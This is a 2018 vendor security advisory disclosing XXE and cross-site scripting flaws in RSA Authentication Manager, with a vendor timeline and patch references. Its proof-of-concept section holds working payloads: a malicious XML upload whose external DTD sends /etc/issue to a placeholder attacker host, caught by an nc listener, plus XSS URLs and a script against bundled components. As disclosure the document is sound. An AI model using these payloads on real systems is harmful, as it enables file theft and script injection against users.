SECConsultVulnerabilityLabSecurityAdvisory<20180516-0>=======================================================================
title:XXE&XSS vulnerabilities
product:RSAAuthenticationManager
vulnerable version:8.2.1.4.0-build1394922,<8.3P1
fixed version:8.3P1 and later
CVE number:CVE-2018-1247
impact:High
homepage: https://www.rsa.com
found:2017-11-16
by:MantasJuskauskas(OfficeVilnius)SECConsultVulnerabilityLabAn integrated part of SECConsultEurope|Asia|NorthAmerica
https://www.sec-consult.com
=======================================================================Vendor description:-------------------
"RSAprovidesmore than 30,000 customers around the world withthe essential
security capabilities toprotect their most valuable assets from cyber
threats. WithRSA's award-winning products, organizations effectively detect,
investigate, and respond toadvanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:------------------------By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSAAuthenticationManager file system,
initiate arbitrary TCP connections or cause DoS. In addition tothis, clients
of the RSAAuthentication manager can be affected by exploiting client-side
issues.SECConsult recommends toapply the available patches from the vendor.
Vulnerability overview/description:-----------------------------------1)XMLExternalEntityInjection(XXE)(CVE-2018-1247)The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able totrick an authenticated
user into importing malicious XML files)toread files, send requests tosystems on the internal network (e.g port scanning) or cause a DoS(e.g.
billion laughs attack).This issue has been fixed by RSA as described in the advisory DSA-2018-086.(http://seclists.org/fulldisclosure/2018/May/18)2)Cross-site FlashingThe vulnerable flash file does not filter or escape the user input
sufficiently. This leads toa reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.
The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.3)DOM based Cross-site ScriptingSeveral client-side scripts handle user supplied data withinsufficient
validation before storing it in the DOM. This issue can be exploited tocause
reflected cross-site scripting.
The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE(CVE-2017-9072).This issue has been fixed by RSA as described in the advisory DSA-2018-082.Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch toRSAyet.
Proof of concept:-----------------1)XMLExternalEntityInjection(XXE)(CVE-2018-1247)TheSecurityConsole of the RSAAuthenticationManager allows authenticated
users toimportSecurIDToken jobs in XMLformat. By importing an XML file
withmaliciousXML code tothe application, it is possible toexploit a blind
XXE vulnerability within the application.
For example, in order toread arbitrary files from the RSAAuthenticationManagerOS, the following malicious XML file can be imported via the affected
endpoint:==========================================================================================POST/console-ims/ImportTokenJob.do?ptoken=[snip]HTTP/1.1Host:<host>:7004Cookie:[snip][snip]-----------------------------9721941626073Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo SYSTEM"http://<attacker>/a.dtd"><key>&e1;</key>-----------------------------9721941626073Content-Disposition: form-data; name="textImportFileName.uploadResult"[snip]==========================================================================================Inthiscase, the attacker has tohost the defined a.dtd file in the web root
of a controlled web server:==========================================================================================
# cat /var/www/a.dtd
<!ENTITY% p1 SYSTEM"file:///etc/issue"><!ENTITY% p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">%p2;==========================================================================================Assuming that the RSAAuthenticationManagerOS has network level access totheTCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked toa remote listener controlled by the attacker:==========================================================================================
# nc -nlvp 8080
listening on [any]8080...
connect to[<attacker>] from (UNKNOWN)[<host>]32817GET/RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1==========================================================================================Similarly, contents of other internal files can be obtained from the affected
system withcurrent service user permissions.2)Cross-site FlashingThe issue affects a third party component pmfso (DSA-2018-082).To exploit a reflected cross-site scripting via the vulnerable SWFFlash file
it is sufficient toclick the following URL:
https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//3)DOM based Cross-site ScriptingExample1:The issue affects a third party component PopCalendarX(CVE-2017-9072).To exploit DOM based reflected cross-site scripting it is enough totrick a
victim into executing the following JavaScript(e.g. by clicking on a
specially crafted link):==========================================================================================<script>
window.name ="gToday:#' onload='alert(document.domain)' ";
location.href ="https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";</script>==========================================================================================Example2:Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Example3:Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Vulnerable/ tested versions:-----------------------------The identified vulnerabilities have been verified toexist in the
RSAAuthenticationManager, version 8.2.1.4.0-build1394922 which was the latest
version available during the test.
Vendor contact timeline:------------------------2017-11-23:Contacting vendor through security_alert@emc.com2017-11-24:Vendor confirms the information was received, forwards it
tothe responsible team for investigation and assigns tickets.2017-12-08:Vendor acknowledges all reported issues as valid. Remediation
plan is being determined.2018-01-04:Contacting vendor for a status update.2018-01-04:Vendorprovidesa possible fix date.2018-02-21:Vendorprovidesa status update regarding the fix release date.2018-04-24:Vendor contacts for credit text approval.2018-05-08:Contacting vendor for the reason of uncoordinated public
release and status information
2018-05-08:Vendorprovidesan update regarding their public release and
status of vulnerabilities not included in the release, vendor info:*DSA-2018-086(http://seclists.org/fulldisclosure/2018/May/18)
was released on 5/4*DSA-2018-082(https://community.rsa.com/docs/DOC-92083)
was released on 5/32018-05-16:Security advisory release
Solution:---------The vendor has released an advisory that contains recommendations of how toresolve the reported XMLExternalEntityInjectionVulnerability:DSA-2018-086- https://community.rsa.com/docs/DOC-92085-(RSALinkSignOnRequired)FullDisclosure archive:
http://seclists.org/fulldisclosure/2018/May/18Note: the suggested resolution also providesa fix for the Cross-site Flashing
and DOM based Cross-site Scripting(only Example1) issues provided in the
descriptions above.
Workaround:-----------NoneAdvisoryURL:-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SECConsultVulnerabilityLabSECConsultEurope|Asia|NorthAmericaAboutSECConsultVulnerabilityLabTheSECConsultVulnerabilityLab is an integrated part of SECConsult. It
ensures the continued knowledge gain of SECConsult in the field of network
and application security tostay ahead of the attacker. TheSECConsultVulnerabilityLab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interestedtoworkwiththe experts of SECConsult?Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security withthe experts of SECConsult?Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOFM. Juskauskas/@2018